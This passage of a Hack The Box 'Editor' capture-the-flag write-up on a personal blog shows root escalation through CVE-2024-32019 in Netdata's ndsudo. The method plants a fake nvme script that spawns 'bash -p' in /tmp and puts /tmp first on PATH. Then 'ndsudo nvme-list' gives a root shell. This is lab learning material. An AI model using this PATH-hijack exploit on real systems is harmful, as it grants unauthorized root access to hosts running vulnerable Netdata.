<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo</span><br></pre></td></tr></table></figure></div>

<p>I had no idea what Netdata was, but I googled it and found out it was vulnerable to CVE-2024-32019. I was like “Wait, this could actually work!”</p>
<hr>
<h2 id="8-The-Simple-Bash-Trick"><a href="#8-The-Simple-Bash-Trick" class="headerlink" title="8. The Simple Bash Trick"></a>8. The Simple Bash Trick</h2><p>So I was looking at this Netdata thing and realized I didn’t actually need to write a C program! I could just create a fake nvme binary using bash. This was way easier than I thought:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;#!/bin/bash&#x27;</span> &gt; /tmp/nvme</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;/bin/bash -p&#x27;</span> &gt;&gt; /tmp/nvme</span><br><span class="line"><span class="built_in">chmod</span> +x /tmp/nvme</span><br></pre></td></tr></table></figure></div>

<p>Then I put <code>/tmp</code> at the front of my PATH so it would find my fake binary first:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">export</span> PATH=/tmp:<span class="variable">$PATH</span></span><br></pre></td></tr></table></figure></div>

<hr>
<h2 id="9-The-Final-Push-Root-at-Last"><a href="#9-The-Final-Push-Root-at-Last" class="headerlink" title="9. The Final Push: Root at Last!"></a>9. The Final Push: Root at Last!</h2><p>Now for the moment of truth. I ran the ndsudo command:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list</span><br></pre></td></tr></table></figure></div>

<p>Instead of running the real nvme binary, it executed my fake one with root privileges, dropping me straight into a root shell!</p>
<p>And… it worked! I got a root shell:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">whoami</span></span><br><span class="line"><span class="comment"># Output: root</span></span><br></pre></td></tr></table></figure></div>

<p>I was literally jumping up and down. I grabbed the root flag:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> /root/root.txt</span><br><span class="line"><span class="comment"># Output: *********************</span></span><br></pre></td></tr></table></figure></div>

<hr>
<h2 id="What-I-Learned-The-Hard-Way"><a href="#What-I-Learned-The-Hard-Way" class="headerlink" title="What I Learned (The Hard Way)"></a>What I Learned (The Hard Way)</h2><ul>
<li><strong>Don’t give up when things don’t work immediately</strong> - I almost quit like 3 times</li>
<li><strong>Google is your best friend</strong> - Seriously, just search for everything</li>
<li><strong>Config files are goldmines</strong> - Always check them for passwords</li>
<li><strong>C programming isn’t as scary as I thought</strong> - The exploit was actually pretty simple</li>
</ul>
<p>This box took me like 6 hours total because I kept going down wrong paths, but man, when I finally got root, it felt amazing!</p>
<blockquote>
<p>“Sometimes the best hacks are the ones that make you want to throw your laptop out the window first.”</p>
</blockquote>
<hr>
<p><em>This writeup is for educational purposes only. Always hack responsibly.</em></p>

		</div>

		

		
		<ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
			
			<li class="tag-item mx-0.5">
				<a href="/tags/Privilege-Escalation/">#Privilege Escalation</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/Editor/">#Editor</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/XWiki/">#XWiki</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/CVE-2025-24893/">#CVE-2025-24893</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/Netdata/">#Netdata</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/CVE-2024-32019/">#CVE-2024-32019</a>&nbsp;
			</li>
			
		</ul>
		

		

		
		<div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
			
			<div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="prev" rel="prev" href="/2025/09/15/hackthebox-soulmate-2025/">
					<span class="left arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-left"></i>
					</span>
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item truncate max-w-48">Hack The Box - Soulmate (2025) Writeup</span>
						<span class="post-nav-item">Prev posts</span>
					</span>
				</a>
			</div>
			
			
			<div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="next" rel="next" href="/2025/08/10/hackthebox-planning-2025/">
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item truncate max-w-48">Hack The Box - Planning (2025) Writeup</span>
						<span class="post-nav-item">Next posts</span>
					</span>
					<span class="right arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-right"></i>
					</span>
				</a>
			</div>
			
		</div>
		


		
	</div>

	
	<div class="toc-content-container">
		<div class="post-toc-wrap">
	<div class="post-toc">
		<div class="toc-title">On this page</div>
		<div class="page-title">Hack The Box - Editor (2025) Writeup</div>
		<ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Editor-Hack-The-Box-2025"><span class="nav-text">Editor (Hack The Box) - 2025</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-The-Usual-Start-Nmap-and-Confusion"><span class="nav-text">1. The Usual Start: Nmap and Confusion</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-Web-Enumeration-Getting-Lost-in-the-Sauce"><span class="nav-text">2. Web Enumeration: Getting Lost in the Sauce</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-The-Google-Rabbit-Hole"><span class="nav-text">3. The Google Rabbit Hole</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-First-Attempts-Epic-Fail"><span class="nav-text">4. First Attempts: Epic Fail</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-The-User-Hunt-Where%E2%80%99s-Oliver"><span class="nav-text">5. The User Hunt: Where’s Oliver?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#6-User-Flag-Finally"><span class="nav-text">6. User Flag: Finally!</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#7-Privilege-Escalation-The-Real-Struggle"><span class="nav-text">7. Privilege Escalation: The Real Struggle</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#8-The-Simple-Bash-Trick"><span class="nav-text">8. The Simple Bash Trick</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#9-The-Final-Push-Root-at-Last"><span class="nav-text">9. The Final Push: Root at Last!</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#What-I-Learned-The-Hard-Way"><span class="nav-text">What I Learned (The Hard Way)</span></a></li></ol></li></ol>

	</div>
</div>
	</div>
	
</div>
			</div>

			
		</div>

		<div class="main-content-footer">
			<footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2025&nbsp;&nbsp;<i class="fa-regular fa-computer-classic"></i>&nbsp;&nbsp;<a href="/">NI8STALKER</a>
            
        </div>
        
        
        
        
        
        
    </div>  
</footer>
		</div>
	</div>

	
	<div class="post-tools">
		<div class="post-tools-container">
	<ul class="article-tools-list">
		<!-- TOC aside toggle -->
		
		<li class="right-bottom-tools page-aside-toggle">
			<i class="fa-regular fa-outdent"></i>
		</li>
		

		<!-- go comment -->
		
	</ul>
</div>
	</div>
	

	<div class="right-side-tools-container">
		<div class="side-tools-container">
	<ul class="hidden-tools-list">
		<li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-plus"></i>
		</li>

		<li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-minus"></i>
		</li>

		<li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
			<i class="fa-regular fa-moon"></i>
		</li>

		<!-- rss -->
		

		

		<li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
			<i class="fa-regular fa-arrow-down"></i>
		</li>
	</ul>

	<ul class="visible-tools-list">
		<li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
			<i class="fa-regular fa-cog fa-spin"></i>
		</li>
		
		<li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
			<i class="arrow-up fas fa-arrow-up"></i>
			<span class="percent"></span>
		</li>
		
		
	</ul>
</div>
	</div>

	<div class="image-viewer-container">
	<img src="">
</div>

	

</main>



<script src="/js/build/libs/Swup.min.js"></script>

<script src="/js/build/libs/SwupSlideTheme.min.js"></script>

<script src="/js/build/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/build/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/build/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/build/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>




	
<script src="/js/build/tools/imageViewer.js" type="module"></script>

<script src="/js/build/utils.js" type="module"></script>

<script src="/js/build/main.js" type="module"></script>

<script src="/js/build/layouts/navbarShrink.js" type="module"></script>

<script src="/js/build/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/build/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/build/layouts/categoryList.js" type="module"></script>





    
<script src="/js/build/tools/codeBlock.js" type="module"></script>




    
<script src="/js/build/layouts/lazyload.js" type="module"></script>






  
<script src="/js/build/libs/Typed.min.js"></script>

  
<script src="/js/build/plugins/typed.js" type="module"></script>








    
<script src="/js/build/libs/anime.min.js"></script>





    
<script src="/js/build/tools/tocToggle.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/layouts/toc.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/plugins/tabs.js" type="module" data-swup-reload-script=""></script>




<script src="/js/build/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>


<script src="/js/build/layouts/essays.js" type="module" data-swup-reload-script=""></script>





	
</body>

</html>